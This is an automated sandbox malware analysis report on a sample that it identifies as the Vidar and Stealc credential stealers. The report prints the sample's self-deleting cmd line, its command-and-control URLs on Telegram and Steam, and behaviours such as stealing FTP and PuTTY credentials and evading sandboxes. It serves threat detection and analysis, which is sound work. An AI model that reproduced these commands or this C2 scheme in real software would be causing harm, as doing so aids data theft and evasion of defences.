Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
njrtdhadawt.exe

Overview

General Information

Sample name:njrtdhadawt.exe
Analysis ID:1575809
MD5:96e4917ea5d59eca7dd21ad7e7a03d07
SHA1:28c721effb773fdd5cb2146457c10b081a9a4047
SHA256:cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957
Tags:exeVidaruser-lontze7
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Classification

Process Tree

  • System is w10x64
  • njrtdhadawt.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\njrtdhadawt.exe" MD5: 96E4917EA5D59ECA7DD21AD7E7A03D07)
    • cmd.exe (PID: 7680 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7724 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199794498376", "Botnet": "idr7ff"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
njrtdhadawt.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    njrtdhadawt.exeJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      njrtdhadawt.exeJoeSecurity_StealcYara detected StealcJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  Click to see the 5 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.2.njrtdhadawt.exe.fe0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.njrtdhadawt.exe.fe0000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      0.2.njrtdhadawt.exe.fe0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                        0.0.njrtdhadawt.exe.fe0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          0.0.njrtdhadawt.exe.fe0000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                            Click to see the 1 entries

                            Sigma Signatures

                            No Sigma rule has matched

                            Suricata Signatures

                            No Suricata rule has matched

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Found malware configuration
                            Source: njrtdhadawt.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199794498376", "Botnet": "idr7ff"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\chrome.dllReversingLabs: Detection: 75%
                            Multi AV Scanner detection for submitted file
                            Source: njrtdhadawt.exeReversingLabs: Detection: 71%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for sample
                            Source: njrtdhadawt.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF2080 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00FF2080
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEA911 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,0_2_00FEA911
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE86EF CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FE86EF
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE8696 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FE8696
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD2B040 BCryptGenRandom,SystemFunction036,0_2_6CD2B040
                            Source: njrtdhadawt.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49741 version: TLS 1.2
                            Source: Binary string: my_library.pdbU source: njrtdhadawt.exe, chrome.dll.0.dr
                            Source: Binary string: my_library.pdb source: njrtdhadawt.exe, chrome.dll.0.dr
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEC087 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FEC087
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF61AE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FF61AE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEBA79 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FEBA79
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF5CE8 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00FF5CE8
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE9DAF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE9DAF
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FE1D70
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FECEEB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FECEEB
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF4EA5 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00FF4EA5
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF561A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00FF561A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FED77A FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FED77A
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FEB719 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FEB719
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD6717D FindFirstFileExW,0_2_6CD6717D
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF531F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00FF531F
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_00FE149D
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_00FE149D

                            Networking

                            barindex
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199794498376
                            Source: global trafficHTTP traffic detected: GET /asg7rd HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199794498376 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE6955 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FE6955
                            Source: global trafficHTTP traffic detected: GET /asg7rd HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199794498376 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NT AUTHORITY\SYSTEMWdtPWdtPWdtP.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: t.me
                            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstat
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
